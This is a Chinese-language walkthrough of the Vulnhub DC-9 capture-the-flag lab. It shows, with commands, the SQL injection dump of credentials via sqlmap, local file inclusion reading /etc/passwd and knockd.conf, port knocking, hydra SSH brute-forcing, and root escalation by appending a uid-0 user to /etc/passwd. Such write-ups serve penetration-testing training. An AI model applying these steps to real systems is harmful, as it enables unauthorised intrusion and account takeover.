目录
一、环境搭建
Vulnhub靶机下载:
官网地址:https://download.vulnhub.com/dc/DC-9.zip
虚拟机:VM虚拟机 或者VBOX 导入即可
网络环境:NAT
介绍:vulnhub是个提供各种漏洞平台的综合靶场,拿到root权限才可以发现最终的flag。
二、信息收集
1 、 主机发现
nmap -sP 192.168.176.0/24
查看服务
nmap -A -p- -v 192.168.176.145
进入网站192.168.176.145
2、指纹识别
whatweb http://192.168.176.145/
没有发现有用信息
三、漏洞复现
1、dirsearch目录探测
dirsearch -u http://192.168.176.145/ -e php -x 400,404,503,403
http://192.168.176.145/manage.php 后台地址
2、sqlmap 注入 测试
发现搜索页面存在SQL注入,
payload:1' or 1=1 #
现在直接使用sqlmap工具来进行SQL注入攻击
sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -dbs
sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -D users -T UserDetails -C username,password -dump
跑出一些账号密码信息 保存一下 密码如下:
| username | password |`
`+-----------+---------------+`
`| marym |` `3kfs86sfd |`
`| julied |` `468sfdfsd2 |`
`| fredf |` `4sfd87sfd1 |`
`| barneyr | RocksOff |`
`| tomc | TC&TheBoyz |`
`| jerrym | B8m#48sd |`
`| wilmaf | Pebbles |`
`| bettyr | BamBam01 |`
`| chandlerb | UrAG0D!` `|`
`| joeyt | Passw0rd |`
`| rachelg | yN72#dsd |`
`| rossg | ILoveRachel |`
`| monicag |` `3248dsds7s |`
`| phoebeb | smellycats |`
`| scoots | YR3BVxxxw87 |`
`| janitor | Ilovepeepee |`
`| janitor2 | Hawaii-Five-0` `|`
`再跑另外一个看一下
sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -D Staff -T StaffDetails -dump
sqlmap -u "http://192.168.176.145/results.php" -data "search=1" -D Staff -T Users -C Password,Username -dump
856f5de590ef37314e7c3bdf6f8a66dc | admin
这里跑出一个admin账号,密码是md5加密
也可以输入yes sqlmap自带的库碰撞
MD5免费在线解密破解_MD5在线加密-SOMD5 在线解密网站,成功拿下
密码:transorbital1
3、文件包含 漏洞
看了半天,只看到这个关键词 ,存在文件包含漏洞
http://192.168.176.145/manage.php/?file=//../../../../etc/passwd
到这里 没思路了 上网看了一下思路
回头看 上面nmap扫描的这个22/tcp filtered ssh # 系统默认开放的,但是通过策略关掉了,因为被策略保护 处于关闭状态,Knockd隐藏SSH
但是这里给出的用户,密码信息 应该是可以 爆破一下ssh
4、Knockd敲门服务
4.1.利用LFI看看konckd的配置文件,可以fuzz一下/etc 目录,一般的配置文件都这个目录里。
payload:file=../../../../../etc/knockd.conf
[options] UseSyslog [openSSH]` `sequence = 7469,8475,9842 seq_timeout = 25 command = /sbin/iptables -I INPUT -s %IP%` `-p tcp --dport 22 -j ACCEPT tcpflags = syn [closeSSH]` `sequence = 9842,8475,7469 seq_timeout = 25 command = /sbin/iptables -D INPUT -s %IP%` `-p tcp --dport 22 -j ACCEPT tcpflags = syn`
`找到了 特定的端口信息,7469,8475,9842,按顺序敲敲门
4.2.nmap开启敲门
第一种方法:
nmap -p 7469 192.168.176.145`
`nmap -p 8475 192.168.176.145`
`nmap -p 9842 192.168.176.145第二种方法:
for x in 7469 8475 9842; do nc 192.168.176.145 $x;done
4.3.现在重新nmap扫描服务看看 直接打开了
nmap -A -p- -v 192.168.176.145
5、ssh爆破
5.1.前面sqlmap跑的一个表 整理成字典
5.2.hy爆破
hydra -L username.txt mark -P pass.txt ssh://192.168.176.145
跑出了两个账户
login: joeyt password: Passw0rd login: janitor password: Ilovepeepee
ssh [email protected] -p 22 ssh连接
在janitor用户发现了一个隐藏的文件夹
cd .secrets-for-putin
ls -a
存在一些密码,写入密码字典,继续爆破 之前没有出来的那些账号
5.3.ssh连接fredf
login: fredf password: B4-Tru3-001
6、提权
接下来提权 查看有无sudo -l权限
sudo -l
发现fredf可以以root的身份执行
(root) NOPASSWD: /opt/devstuff/dist/test/test
是一个python文件 ,文件的意思是,读取第一个文件追加到第二个文件上
利用find指令找到这个python文件
命令:
find / -name "test.py" 2>/dev/null 寻找叫做test.py的文件
接着在/opt/devstuff/发现python源文件:test.py
代码如下:
import sys`
`if` `len` `(sys.argv)` `!=` `3 :`
`print` `("Usage: python test.py read append")`
` sys.exit` `(1)`
`else :`
` f =` `open(sys.argv[1],` `"r")`
` output =` `(f.read())`
` f =` `open(sys.argv[2],` `"a")`
` f.write(output)`
` f.close()`
`这是一个可以写入文件的一个python程序,我们可以以root权限写入任意一个文件
所以我们接下来要以root权限在/etc/passwd中写入一个具有root权限的用户
因为在/etc/passwd中的密码都是加密过的,我们也要设计一个加密的密码
设置密码命令:
openssl passwd -1(md5加密算法) -salt(用一个随机数去加盐) admin 123456
openssl passwd -1 -salt admin 123456
生成密码:1admin$LClYcRe.ee8dQwgrFc5nz.
先把这些写入临时文件,再用test.py读取文件,追加到passwd里面
1、写入临时文件
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0:/root:/bin/bash'` `>>/tmp/mm2、python程序追加到etc/passwd
sudo ./test /tmp/mm.txt /etc/passwd
3、切换用户看看
su admin
4、交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
四 、提取flag
